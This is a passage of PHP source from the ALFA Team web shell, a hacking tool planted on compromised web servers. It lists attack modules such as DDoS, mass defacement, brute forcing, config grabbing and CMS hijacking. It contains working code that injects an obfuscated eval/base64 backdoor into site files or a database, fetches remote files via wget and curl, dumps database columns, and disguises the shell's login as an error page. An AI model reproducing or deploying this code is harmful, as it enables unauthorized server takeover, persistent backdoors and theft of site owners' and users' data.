1203$li = array('proc'=>'Process','phpeval'=>'Eval','sql'=>'SQL Manager','dumper'=>'Database Dumper','coldumper'=>'Column Dumper','hash'=>'En-Decoder','connect'=>'BC',
1204'zoneh'=>'ZONE-H','dos'=>'DDOS','safe'=>'ByPasser','cgishell'=>'Cgi Shell','ssiShell'=>'SSI SHELL','cpcrack'=>'Hash Tools',
1205'portscanner'=>'Port Scaner','basedir'=>'Open BaseDir','mail'=>'Fake Mail','ziper'=>'Compressor','deziper'=>'DeCompressor','IndexChanger'=>'Index Changer','pwchanger'=>'Add New Admin','ShellInjectors'=>'Shell Injectors',
1206'php2xml'=>'PHP2XML','cloudflare'=>'CloudFlare','Whmcs'=>'Whmcs DeCoder','symlink'=>'Symlink','MassDefacer'=>'Mass Defacer','Crackers'=>'BruteForcer','searcher'=>'Searcher','config_grabber'=>'Config Grabber','fakepage'=>'Fake Page','archive_manager'=>'Archive Manager',
1207'cmshijacker'=>'CMS Hijacker','remotedl'=>'Remote Upload','inbackdoor'=>'Install BackDoor','whois'=>'Whois','selfrm'=>'Remove Shell'
1208);
1209foreach($li as $key=>$value){
1210echo('<li><a id="menu_opt_'.$key.'" href="#action=options&path='.$GLOBALS['cwd'].'&opt='.$key.'" class="menu_options" onclick="alfa_can_add_opt=true;this.href=\'#action=options&path=\'+c_+\'&opt='.$key.'\';g(\''.$key.'\',null,\'\',\'\',\'\');d.querySelector(\'.opt-title\').innerHTML=this.innerHTML;">'.$value.'</a></li>'."\n");
1211}
1212echo '</ul><div style="text-align: center;padding: 6px;"><a id="menu_opt_settings" href="#action=options&path='.$GLOBALS['cwd'].'&opt=settings" class="menu_options" onclick="alfa_can_add_opt=true;this.href=\'#action=options&path=\'+c_+\'&opt=settings\';g(\'settings\',null,\'\',\'\',\'\');d.querySelector(\'.opt-title\').innerHTML=this.innerHTML;">Alfa Settings</a><a style="display:none;" id="menu_opt_market" href="#action=options&path='.$GLOBALS['cwd'].'&opt=market" class="menu_options" onclick="alfa_can_add_opt=true;this.href=\'#action=options&path=\'+c_+\'&opt=market\';g(\'market\',null,\'\',\'\',\'\');d.querySelector(\'.opt-title\').innerHTML=this.innerHTML;"><span class="alfa_plus">Alfa market</span></a><a id="menu_opt_aboutus" href="#action=options&path='.$GLOBALS['cwd'].'&opt=aboutus" class="menu_options" onclick="alfa_can_add_opt=true;this.href=\'#action=options&path=\'+c_+\'&opt=aboutus\';g(\'aboutus\',null,\'\',\'\',\'\');d.querySelector(\'.opt-title\').innerHTML=this.innerHTML;">About Us</a>'.(!empty($_COOKIE['AlfaUser']) && !empty($_COOKIE['AlfaPass']) ? '<a href="javascript:void(0);" onclick="alfaLogOut();"><font color="red">LogOut</font></a>':'').'</div></div><div id="filesman_tabs"><div onmouseover="alfaFilesmanTabShowTitle(this,event);" onmouseout="alfaFilesmanTabHideTitle(this,event);" fm_counter="1" path="'.$GLOBALS['cwd'].'" fm_id="1" id="filesman_tab_1" class="filesman_tab filesman-tab-active" onclick="filesmanTabController(this);"><img class="folder-tab-icon" src="http://solevisible.com/icons/menu/folder2.svg"> <span>File manager</span></div><div style="display:inline-block;" id="filesman_tabs_child"></div><div id="filesman_new_tab" class="filesman_tab" style="background: maroon;" onClick="alfaFilesManNewTab(c_,\'/\',1);">New Tab +</div></div>';}else{
1213@error_reporting(E_ALL ^ E_NOTICE);
1214@ini_set('error_log',NULL);
1215@ini_set('log_errors',0);
1216@ini_set('max_execution_time',0);
1217@ini_set('magic_quotes_runtime', 0);
1218@set_time_limit(0);
1219}}
1220function alfalogout(){
1221@setcookie("AlfaUser", null, 2012);
1222@setcookie("AlfaPass", null, 2012);
1223unset($_COOKIE['AlfaUser'],$_COOKIE['AlfaPass']);
1224echo("ok");
1225}
1226function showAnimation($name){
1227 return '-webkit-animation: '.$name.' 800ms ease-in-out forwards;-moz-animation: '.$name.' 800ms ease-in-out forwards;-ms-animation: '.$name.' 800ms ease-in-out forwards;animation: '.$name.' 800ms ease-in-out forwards;';
1228}
1229function __showicon($r){
1230 $s['btn']='http://solevisible.com/images/btn.png';
1231 $s['alfamini']='http://solevisible.com/images/alfamini.png';
1232 $s['loader']='http://solevisible.com/images/loader.svg';
1233 //return 'data:image/png;base64,'.__get_resource($s[$r]);
1234 return $s[$r];
1235}
1236function alfainbackdoor(){
1237alfahead();
1238echo '<div class=header><center><p><div class="txtfont_header">| Install BackDoor |</div></p><h3><a href=javascript:void(0) onclick="g(\'inbackdoor\',null,\'file\')">| In File | </a><a href=javascript:void(0) onclick="g(\'inbackdoor\',null,\'db\')">| In DataBase | </a></h3></center>';
1239$error = '<font color="red">Error In Inject BackDoor...!<br>File Loader is not Writable Or Not Exists...!</font>';
1240$success= '<font color="green">Success...!';
1241$textarea = "<div style='display:none;' id='backdoor_textarea'><div class='txtfont'>Your Shell:</div><p><textarea name='shell' rows='19' cols='103'><?php\n\techo('Alfa Team is Here...!');\n?></textarea></p></div>";
1242$select = "<div class='txtfont'>Use:</div> <select name='method' style='width:155px;' onChange='inBackdoor(this);'><option value='alfa'>Alfa Team Uploader</option><option value='my'>My Private Shell</option></select>";
1243$cwd = 'Example: /home/alfa/public_html/index.php';
1244if($_POST['alfa1']=='file'){
1245echo("<center><p><div class='txtfont_header'>| In File |</div></p><p><form onsubmit=\"g('inbackdoor',null,'file',this.method.value,this.file.value,this.shell.value,this.key.value);return false;\">{$select} <div class='txtfont'>Backdoor Loader:</div> <input type='text' name='file' size='50' placeholder='{$cwd}'> <div class='txtfont'>Key: </div> <input type='text' name='key' size='10' value='alfa'> <input type='submit' value=' '>{$textarea}</form></p></center>");
1246if($_POST['alfa2']!=''&&$_POST['alfa3']!=''&&$_POST['alfa4']!=''){
1247$method = $_POST['alfa2'];
1248$file = $_POST['alfa3'];
1249$shell = $_POST['alfa4'];
1250$key = str_replace(array('"','\''),'',trim($_POST['alfa5']));
1251if($key=='')$key='alfa';
1252if($method=='my'){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];}
1253$code = '<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="'.$key.'"){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."(\'?>\'.base"."64"."_dec"."ode(\$c));");$x("'.$shell.'");exit;}?>';
1254if(@is_file($file)&&@is_writable($file)){@file_put_contents($file,$code."\n".@file_get_contents($file));__alert($success."<br>Run With: ".basename($file)."?alfa=".$key.'</font>');}else{__alert($error);}}}
1255if($_POST['alfa1']=='db'){
1256echo("<center><p><div class='txtfont_header'>| In DataBase |</div></p>".getConfigHtml('all')."<p><form onsubmit=\"g('inbackdoor',null,'db',this.db_host.value,this.db_username.value,this.db_password.value,this.db_name.value,this.file.value,this.method.value,this.shell.value,this.key.value);return false;\">");
1257$table = array('td1' =>
1258array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
1259'td2' =>
1260array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
1261'td3' =>
1262array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
1263'td4' =>
1264array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
1265'td5' =>
1266array('color' => 'FFFFFF', 'tdName' => 'Backdoor Loader: ', 'inputName' => 'file', 'inputValue' => $cwd, 'inputSize' => '50', 'placeholder' => true),
1267'td6' =>
1268array('color' => 'FFFFFF', 'tdName' => 'Key: ', 'inputName' => 'key', 'inputValue' => 'alfa', 'inputSize' => '50')
1269);
1270create_table($table);
1271echo("<p>{$select}</p>");
1272echo($textarea);
1273echo("<p><input type='submit' value=' '></p></form></p></center>");
1274if($_POST['alfa2']!=''&&$_POST['alfa3']!=''&&$_POST['alfa5']!=''&&$_POST['alfa6']!=''){
1275$dbhost = $_POST['alfa2'];
1276$dbuser = $_POST['alfa3'];
1277$dbpw = $_POST['alfa4'];
1278$dbname = $_POST['alfa5'];
1279$file = $_POST['alfa6'];
1280$method = $_POST['alfa7'];
1281$shell = $_POST['alfa8'];
1282$key = str_replace(array('"','\''),'',trim($_POST['alfa9']));
1283if($key=='')$key='alfa';
1284if($method=='my'){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];}
1285if($conn = mysqli_connect($dbhost,$dbuser,$dbpw,$dbname)){
1286$code = '<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="'.$key.'"){$conn=mysqli_connect("'.str_replace('"','\"',$dbhost).'","'.str_replace('"','\"',$dbuser).'","'.str_replace('"','\"',$dbpw).'","'.str_replace('"','\"',$dbname).'");$q=mysqli_query($conn,"SELECT `code` FROM alfa_bc LIMIT 0,1");$r=mysqli_fetch_assoc($q);$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."(\'?>\'.base"."64"."_dec"."ode(\$c));");$x($r["code"]);exit;}?>';
1287if(@is_file($file)&&@is_writable($file)){
1288@mysqli_query($conn,'DROP TABLE `alfa_bc`');
1289@mysqli_query($conn,'CREATE TABLE `alfa_bc` (code LONGTEXT)');
1290@mysqli_query($conn,'INSERT INTO `alfa_bc` VALUES("'.$shell.'")');
1291@file_put_contents($file,$code."\n".@file_get_contents($file));
1292__alert($success."<br>Run With: ".basename($file)."?alfa=".$key.'</font>');}else{__alert($error);}}}}
1293echo('</div>');
1294alfafooter();
1295}
1296function alfawhois(){
1297echo("<div class='header'><center><p><div class='txtfont_header'>| Whois |</div></p><p><form onsubmit=\"g('whois',null,this.url.value,'>>');return false;\"><div class='txtfont'>Url: </div> <input type='text' name='url' style='text-align:center;' size='50' placeholder='google.com'> <input type='submit' value=' '></form></p></center>");
1298if($_POST['alfa2']=='>>'&&!empty($_POST['alfa1'])){
1299$site = str_replace(array('http://','https://','www.','ftp://'),'',$_POST['alfa1']);
1300$target = 'http://api.whoapi.com/?apikey=093b6cb9e6ea724e101928647df3e009&r=whois&domain='.$site;
1301$data = @file_get_contents($target);
1302if($data==''){$get = new AlfaCURL();$get->ssl = true;$data = $get->Send($target);}
1303$target = @json_decode($data,true);
1304echo __pre();
1305if(is_array($target)){echo($target["whois_raw"]);}else{echo alfaEx("whois ".$site);}}
1306echo("</div>");
1307}
1308function alfaremotedl(){
1309alfahead();
1310echo("<div class='header'><center><p><div class='txtfont_header'>| Upload From Url |</div></p><p>
1311<form onsubmit=\"g('remotedl',null,this.d.value,this.p.value,'>>');return false;\">
1312<p><div class='txtfont'>Url: </div> <input type='text' name='d' size='50'></p>
1313<div class='txtfont'>Path:</div> <input type='text' name='p' size='50' value='".$GLOBALS['cwd']."'><p><input type='submit' value=' '></p>
1314</form></p></center>");
1315if(isset($_POST['alfa1'],$_POST['alfa2'],$_POST['alfa3'])&&!empty($_POST['alfa1'])&&$_POST['alfa3']=='>>'){
1316echo __pre();
1317$url = $_POST['alfa1'];
1318$path = $_POST['alfa2'];
1319echo('<center>');
1320if(__download($url,$path)){
1321echo('<font color="green">Success...!</font>');
1322}else{
1323echo('<font color="red">Error...!</font>');
1324}
1325echo('</center>');
1326}
1327echo("</div>");
1328alfafooter();
1329}
1330function __download($url,$path=false){
1331if(!preg_match("/[a-z]+:\/\/.+/",$url)) return false;
1332$saveas = basename(rawurldecode($url));
1333if($path){$saveas=$path.$saveas;}
1334if($content = __read_file($url)){
1335if(@is_file($saveas))@unlink($saveas);
1336if(__write_file($saveas, $content)){return true;}}
1337$buff = alfaEx("wget ".$url." -O ".$saveas);
1338if(@is_file($saveas)) return true;
1339$buff = alfaEx("curl ".$url." -o ".$saveas);
1340if(@is_file($saveas)) return true;
1341$buff = alfaEx("lwp-download ".$url." ".$saveas);
1342if(@is_file($saveas)) return true;
1343$buff = alfaEx("lynx -source ".$url." > ".$saveas);
1344if(@is_file($saveas)) return true;
1345$buff = alfaEx("GET ".$url." > ".$saveas);
1346if(@is_file($saveas)) return true;
1347$buff = alfaEx("links -source ".$url." > ".$saveas);
1348if(@is_file($saveas)) return true;
1349$buff = alfaEx("fetch -o ".$saveas." -p ".$url);
1350if(@is_file($saveas)) return true;
1351return false;
1352}
1353function clean_string($string){
1354 if(function_exists("iconv")){
1355 $s = trim($string);
1356 $s = iconv("UTF-8", "UTF-8//IGNORE", $s);
1357 }
1358 return $s;
1359}
1360function __read_file($file, $boom = true){
1361$content = false;
1362if($fh = @fopen($file, "rb")){
1363$content = "";
1364while(!feof($fh)){
1365$content .= $boom ? clean_string(fread($fh, 8192)) : fread($fh, 8192);
1366}
1367@fclose($fh);
1368}
1369if(empty($content)||!$content){
1370 $content = alfaEx("cat '".addslashes($file)."'");
1371}
1372return $content;
1373}
1374function alfaMarket(){
1375echo "<div class='header'>";
1376$curl = new AlfaCURL();
1377$content = $curl->Send("http://solevisible.com/market.php");
1378$data = @json_decode($content, true);
1379if(!empty($data)){
1380if($data["status"] == "open"){
1381 echo $data["content"];
1382}else{
1383 echo $data["error_msg"];
1384}
1385}else{
1386 echo "<div style='text-align:center;font-size:20px;'>Cant connect to the alfa market....! try later.</div>";
1387}
1388echo "</div>";
1389}
1390function alfaSettings(){
1391alfahead();
1392AlfaNum(6,7,8,9,10);
1393echo '<div class=header><center><p><div class="txtfont_header">| Settings |</div></p><h3><a href=javascript:void(0) onclick="g(\'settings\',null,null,null,null,null,null,null,null,\'main\')">| Generall Setting | </a></h3></center>';
1394if($_POST["alfa8"] == "main"){
1395echo '<p><center><div class="txtfont_header">| Settings |</div></p><form onSubmit="reloadSetting(this);return false;" method=\'post\'>';
1396$lg_array = array('0'=>'No','1'=>'Yes');
1397$penc_array = array('false'=>'No','true'=>'Yes');
1398$protect_html = "";
1399$icon_html = "";
1400$postEnc_html = "";
1401$login_html = "";
1402$cgiapi_html = "";
1403foreach($lg_array as $key=>$val)$protect_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['safemode']=='1'?'selected':'').'>'.$val.'</option>';
1404foreach($lg_array as $key=>$val)$icon_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['show_icons']=='1'?'selected':'').'>'.$val.'</option>';
1405foreach($penc_array as $key=>$val)$cgiapi_html .= '<option value="'.$key.'" '.(!empty($_POST['alfa9'])&&$_POST['alfa9']==$key?"selected":($GLOBALS["DB_NAME"]["cgi_api"]&&empty($_POST['alfa9'])?'selected':'')).'>'.$val.'</option>';
1406foreach($penc_array as $key=>$val)$postEnc_html .= '<option value="'.$key.'" '.(!empty($_POST['alfa7'])&&$_POST['alfa7']==$key?"selected":(__ALFA_POST_ENCRYPTION__&&empty($_POST['alfa7'])?'selected':'')).'>'.$val.'</option>';
1407$lg_array = array("gui"=>"GUI","500"=>"500 Internal Server Error","403"=>"403 Forbidden","404"=>"404 NotFound");
1408foreach($lg_array as $key=>$val)$login_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['login_page']==$key?'selected':'').'>'.$val.'</option>';
1409echo '';
1410echo '<table border="1"><tbody><tr><td><div class="tbltxt" style="color:#FFFFFF">Protect:</div></td><td><select name="protect" style="width:100%;">'.$protect_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Cgi Api:</div></td><td><select name="cgi_api" style="width:100%;">'.$cgiapi_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Post Encryption:</div></td><td><select name="post_encrypt" style="width:100%;">'.$postEnc_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Show Icons:</div></td><td><select name="icon" style="width:100%;">'.$icon_html.'</select></td></tr><tr><tr><td><div class="tbltxt" style="color:#FFFFFF">login Page:</div></td><td><select style="width:100%;" name="lgpage">'.$login_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">UserName:</div></td><td><input type="text" style="width:95%;" name="username" value="'.(empty($_POST['alfa3'])?$GLOBALS['DB_NAME']['user']:$_POST['alfa3']).'" placeholder="solevisible"></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Password:</div></td><td><input type="text" style="width:95%;" name="password" placeholder="*****"></td></tr></tbody></table><input type="hidden" name="e" value="'.$GLOBALS['DB_NAME']['safemode'].'"><input type="hidden" name="s" value="'.$GLOBALS['DB_NAME']['show_icons'].'"><p><input type="submit" name="btn" value=" "></p></form></center>';
1411if($_POST['alfa5']=='>>'){
1412echo __pre();
1413if(!empty($_POST['alfa3'])){
1414$protect = $_POST['alfa1'];
1415$lgpage = $_POST['alfa2'];
1416$username = $_POST['alfa3'];
1417$password = md5($_POST['alfa4']);
1418$icon = $_POST['alfa6'];
1419$post_encrypt = $_POST['alfa7'];
1420$cgi_api_val = $_POST['alfa9'];
1421@chdir($GLOBALS['home_cwd']);
1422$basename = @basename($_SERVER['PHP_SELF']);
1423$data = @file_get_contents($basename);
1424$user_rand = $GLOBALS["DB_NAME"]["user_rand"];
1425$pass_rand = $GLOBALS["DB_NAME"]["pass_rand"];
1426$login_page_rand = $GLOBALS["DB_NAME"]["login_page_rand"];
1427$safemode_rand = $GLOBALS["DB_NAME"]["safemode_rand"];
1428$show_icons_rand = $GLOBALS["DB_NAME"]["show_icons_rand"];
1429$post_encryption_rand = $GLOBALS["DB_NAME"]["post_encryption_rand"];
1430$cgi_api_rand = $GLOBALS["DB_NAME"]["cgi_api_rand"];
1431$find_user = '/\''.$user_rand.'\'(.*?),/i';
1432$find_pw = '/\''.$pass_rand.'\'(.*?),/i';
1433$find_lg = '/\''.$login_page_rand.'\'(.*?),/i';
1434$find_p = '/\''.$safemode_rand.'\'(.*?),/i';
1435$icons = '/\''.$show_icons_rand.'\'(.*?),/i';
1436$postEnc = '/\''.$post_encryption_rand.'\'(.*?),/i';
1437$cgi_api_reg = '/\''.$cgi_api_rand.'\'(.*?),/i';
1438if(!empty($username)&&preg_match($find_user,$data,$e)){
1439$new = '\''.$user_rand.'\' => \''.$username.'\',';
1440$data = str_replace($e[0],$new,$data);
1441}
1442if(!empty($_POST['alfa4'])&&preg_match($find_pw,$data,$e)){
1443$new = '\''.$pass_rand.'\' => \''.$password.'\',';
1444$data = str_replace($e[0],$new,$data);
1445}
1446if(!empty($lgpage)&&preg_match($find_lg,$data,$e)){
1447$new = '\''.$login_page_rand.'\' => \''.$lgpage.'\',';
1448$data = str_replace($e[0],$new,$data);
1449}
1450if(!empty($find_p)&&preg_match($find_p,$data,$e)){
1451$new = '\''.$safemode_rand.'\' => \''.$protect.'\',';
1452$data = str_replace($e[0],$new,$data);
1453}
1454if(preg_match($icons,$data,$e)){
1455$new = '\''.$show_icons_rand.'\' => \''.$icon.'\',';
1456$data = str_replace($e[0],$new,$data);
1457}
1458if(preg_match($postEnc,$data,$e)){
1459$new = '\''.$post_encryption_rand.'\' => '.$post_encrypt.',';
1460$data = str_replace($e[0],$new,$data);
1461}
1462if(preg_match($cgi_api_reg,$data,$e)){
1463$new = '\''.$cgi_api_rand.'\' => '.$cgi_api_val.',';
1464$data = str_replace($e[0],$new,$data);
1465}
1466if(@file_put_contents($basename,$data)){
1467echo '<b>UserName: </b><font color="green"><b>'.$username.'</b></font><br /><b>Password: </b><font color="green"><b>'.$_POST['alfa4'].'</b></font><script>post_encryption_mode = '.$post_encrypt.';</script>';
1468}else{
1469__alert("<span style='color:red;'>File has no edit access...!</span>");
1470}
1471}else{
1472__alert("<span style='color:red;'>UserName is Empty !</span>");
1473}
1474}
1475}elseif($_POST["alfa8"] == "color"){
1476echo('<center><p><div class="txtfont_header">| Custom Color |</div></p><form onSubmit="reloadColors();return false;" method=\'post\'>');
1477echo '<table border="1"><tbody>';
1478$template = '<tr><td style="text-align:center;"><a href="http://solevisible.com/customcolors/{help}.png" target="_blank"><font color="#00FF00">Help</font></a></td><td style="text-align:center;"><div class="tbltxt">{index}</div></td><td><div class="tbltxt" style="margin-left:5px;">{target}:</div></td><td><input style="width:60px;" multi="{multi}" id="gui_{target}" onChange="colorHandler(this);" target=".{target}" type="color" value="{color}"></td><td><input type="text" style="text-align:center;" multi="{multi}" onkeyup="colorHandlerKey(this);" target=".{target}" id="input_{target}" class="colors_input" placeholder="#ffffff" value="{color}"></td></tr>';
1479$x = 1;
1480foreach($GLOBALS['__ALFA_COLOR__'] as $key => $value){
1481 $multi = "";
1482 if(is_array($value)){
1483 if(isset($value["multi_selector"])){
1484 $multi = __ZW5jb2Rlcg(json_encode($value));
1485 }
1486 }
1487 $value = alfa_getColor($key);
1488 $help = strtolower(str_replace(array(":", "+"), array("_", "_plus"), $key));
1489 echo str_replace(array("{index}", "{target}", "{color}", "{multi}", "{help}"), array($x++, $key, $value, $multi, $help), $template);
1490}
1491echo '<tr><td style="text-align:center;">-</td><td style="text-align:center;"><div class="tbltxt">*</div></td><td><div style="margin-left:5px;" class="tbltxt">Use Default Color:</div></td><td></td><td><center><input type="checkbox" id="use_default_color" value="1"></center></td></tr>';
1492
1493echo '</tbody></table><p><input type="submit" name="btn" value=" "></p></form><p><button style="padding:4px;;margin-right:20px;" onclick="$(\'importFileBtn\').click();" class="button"> Import </button> <button style="padding:4px;margin-left:20px;" onclick="g(\'settings\',null,null,null,null,null,null,null,\'export\',\'color\')" class="button"> Export </button></center></p>';
1494if($_POST['alfa7']=='export'){
1495 echo __pre();
1496 $colors = is_array($GLOBALS["DB_NAME"]["color"])?$GLOBALS["DB_NAME"]["color"]:array();
1497 $glob_colors = $GLOBALS["__ALFA_COLOR__"];
1498 $array = array();
1499 foreach($glob_colors as $k => $v){
1500 if(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){
1501 $v = trim($colors[$k]);
1502 }else{
1503 $v = trim(is_array($v)?$v["key_color"]:$v);
1504 }
1505 $array[$k] = $v;
1506 }
1507 $file = "alfa_color_config_".date('Y-m-d-h_i_s').".conf";
1508 $config = json_encode($array, JSON_PRETTY_PRINT);
1509 if(!@file_put_contents($file, $config)){
1510 echo('<p><center>Color Config:<br><br><textarea rows="12" cols="70" type="text">'.$config.'</textarea></center></p>');
1511 }else{
1512 echo('<h3><p><center><a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\''.$file.'\', \'download\')"><font color="#0F0">Download Config</font></a></center></p></h3>');
1513 }
1514}
1515if($_POST['alfa2']=='>>'){
1516 echo __pre();
1517 $colors = json_decode($_POST["alfa1"],true);
1518 $array = "";
1519 $is_default = isset($_POST["alfa3"])&&$_POST["alfa3"]=="1"?true:false;
1520 $glob_colors = $GLOBALS["__ALFA_COLOR__"];
1521 foreach($glob_colors as $k => $v){
1522 if(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){
1523 $v = trim($colors[$k]);
1524 }else{
1525 $v = trim(is_array($v)?$v["key_color"]:$v);
1526 }
1527 $array .= '"'.trim($k).'" => "'.$v.'",';
1528 }
1529 @chdir($GLOBALS['home_cwd']);
1530 $basename = @basename($_SERVER['PHP_SELF']);
1531 $data = @file_get_contents($basename);
1532 $color = '/\'color\'(.*?)\),/s';
1533 if(preg_match($color,$data,$e)){
1534 $new = "'color' => array(".$array."),";
1535 $data = str_replace($e[0],$new,$data);
1536 if(@file_put_contents($basename, $data)){
1537 echo("<center><p><h3>[+] Success...</h3></p></center><script>location.reload();</script>");
1538 }else{
1539 echo("<center><p><h3>[-] We Not have permission to Edit shell...!</h3></p></center>");
1540 }
1541 }else{
1542 echo("<center><p><h3>[-] Error...!</h3></p></center>");
1543 }
1544}
1545}
1546echo('</div>');
1547alfafooter();
1548}
1549function alfaaboutus(){
1550alfahead();
1551echo '<div class="header">';
1552$news = new AlfaCURL();
1553$about_us = $news->Send("http://solevisible.com/aboutus.php");
1554if(empty($about_us)){
1555$about_us = "<pre><center><img src='http://solevisible.com/images/farvahar-iran.png'><br>
1556<b><font size='+3' color='#00A220'>☮ ~ PEACE ~ ☮</font><br><b>
1557<font color='#00A220'>Shell Coded By Sole Sad & Invisible (ALFA TEaM)</font><br>
1558<font color='#00A220'>Contact : solevisible@gmail.com</font><br>
1559<font color='#00A220'>Telegram Channel: @solevisible</font><br>
1560<font color='#FFFFFF'>Skype : ehsan.invisible</font><br>
1561<font color='#FFFFFF'>Skype : sole.sad</font><br>
1562<font color='#FF0000'>Persian Gulf For Ever</font><br>
1563<font color='#FF0000'>Iranian Programmers</font><br>
1564<font color='#FF0000'>############</font><br>
1565</center></pre><iframe src='tg://resolve?domain=solevisible' frameborder='0' width='0' height='0'></iframe>";
1566}
1567echo __pre().$about_us;
1568echo('</div>');
1569alfafooter();
1570}
1571function alfacoldumper(){
1572alfahead();
1573echo('<div class="header">');
1574AlfaNum(8,9,10);
1575echo "<center><br><div class='txtfont_header'>| Mysql Column Dumper |</div><br><br>".getConfigHtml('all')."<form method='post' onsubmit=\"var opt_id=this.getAttribute('opt_id');var delimiter='json';try{if($('dumper-delimiter-type').value == 'delimiter')delimiter=$('dumper-delimiter-input').value}catch(e){};g('coldumper',null,delimiter,JSON.stringify(col_dumper_selected_data[opt_id]),this.db_username.value,this.db_password.value,this.db_name.value,this.dfile.value,this.db_host.value); col_dumper_selected_data[opt_id] = {};return false;\"><p>";
1576$delimiter = (!empty($_POST['alfa1']) ? $_POST['alfa1'] : '::');
1577$selected_data = json_decode($_POST['alfa2'], true);
1578$username = ($_POST['alfa3']);
1579$password = ($_POST['alfa4']);
1580$dbname = ($_POST['alfa5']);
1581$dfile = ($_POST['alfa6']);
1582$host = ($_POST['alfa7']);
1583$table = array('td1' =>
1584 array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => $host, 'inputSize' => '50'),
1585 'td2' =>
1586 array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => $username, 'inputSize' => '50'),
1587 'td3' =>
1588 array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => $password, 'inputSize' => '50'),
1589 'td4' =>
1590 array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => $dbname, 'inputSize' => '50'),
1591 'td5' =>
1592 array('color' => 'FFFFFF', 'tdName' => 'Output Path: ', 'inputName' => 'dfile', 'inputValue' => htmlspecialchars($GLOBALS['cwd']), 'inputSize' => '50')
1593);
1594create_table($table);
1595echo "<br><input type='submit' value=' ' name='Submit'></p></form></center>";
1596$db = false;
1597if(!empty($dbname)){
1598 $db = @mysqli_connect($host, $username, $password, $dbname);
1599}
1600if(count($selected_data) > 0){
1601 if($db){
1602 if(!is_dir($dfile)){
1603 $dfile = $GLOBALS['cwd'];
1604 }
1605 $tbls = "";
1606 $ext = '.txt';
1607 if($delimiter == 'json'){
1608 $ext = '.json';
1609 }
1610 foreach ($selected_data as $tbl => $cols) {
1611 $tables_query = mysqli_query($db, "SELECT ".implode(',', $cols)." FROM $tbl");
1612 $file_name = $dfile.'/'.$dbname.'.'.$tbl.$ext;
1613 $fp = fopen($file_name, "w");
1614 $data = array();
1615 while($row = mysqli_fetch_array($tables_query, MYSQLI_ASSOC)){
1616 if($delimiter == "json"){
1617 $col_arr = array();
1618 foreach ($row as $key => $value) {
1619 if(empty($value)){
1620 $value = "[empty]";
1621 }
1622 $col_arr[$key] = $value;
1623 }
1624 $data[$tbl][] = $col_arr;
1625 }else{
1626 $data = "";
1627 foreach ($row as $key => $value) {
1628 if(empty($value)){
1629 $value = "[empty]";
1630 }
1631 $data .= $value . $delimiter;
1632 }
1633 fwrite($fp, $data ."\n");
1634 }
1635 }
1636 if($delimiter == "json"){
1637 fwrite($fp, json_encode($data));
1638 }
1639 fclose($fp);
1640 $tbls .= "Done ~~~> ".$file_name."<br>";
1641 }
1642 echo __pre();
1643 echo "<center><font color='#00FF00'>".$tbls."</font></center>";
1644 }
1645}
1646if(!empty($dbname) && count($selected_data) == 0){
1647//echo __pre();
1648if($db){
1649 echo("<hr><div style='text-align:center;margin-bottom:5px;font-weight:bolder;'><span>[ Select your tables and columns for dumping data ]</span></div>");
1650 echo("<div style='text-align:center;'><span>Output Type: </span><select id='dumper-delimiter-type' onchange='colDumplerSelectType(this);' name='output_type'><option value='delimiter' selected>delimiter</option><option value='json'>json</option></select><div id='coldumper-delimiter-input' style='display:inline;'><span> Delimiter: </span><input id='dumper-delimiter-input' style='text-align:center;' type='text' name='delimiter' placeholder='eg: ,'></div></div>");
1651 $data = array();
1652 $tables_query = mysqli_query($db, "SELECT table_name FROM information_schema.tables WHERE table_schema = database();");
1653 while($row = mysqli_fetch_array($tables_query, MYSQLI_ASSOC)){
1654 $data[$row["table_name"]] = array();
1655 $table_count_q = mysqli_query($db, "SELECT count(*) FROM `".$row['table_name']."`");
1656 $table_count = mysqli_fetch_row($table_count_q);
1657 $data[$row["table_name"]]["data_count"] = $table_count[0];
1658 $columns_query = mysqli_query($db, "SELECT column_name FROM information_schema.columns WHERE table_name = '".$row['table_name']."'");
1659 while($row2 = mysqli_fetch_array($columns_query, MYSQLI_ASSOC)){
1660 $data[$row["table_name"]]["cols"][] = $row2["column_name"];
1661 }
1662 }
1663 mysqli_close($db);
1664
1665 echo '<ul id="myUL">';
1666 foreach($data as $tbl => $cols){
1667 echo '<li><span style="color:#00FF00;" class="box">'.$tbl.' ('.$cols["data_count"].')</span><ul class="nested">';
1668 foreach($cols["cols"] as $col){
1669 echo '<li tbl="'.$tbl.'"><span style="color:#00FF00;" tbl="'.$tbl.'" class="box sub-box">' . $col . '</span></li>';
1670 }
1671 echo '</ul></li>';
1672 }
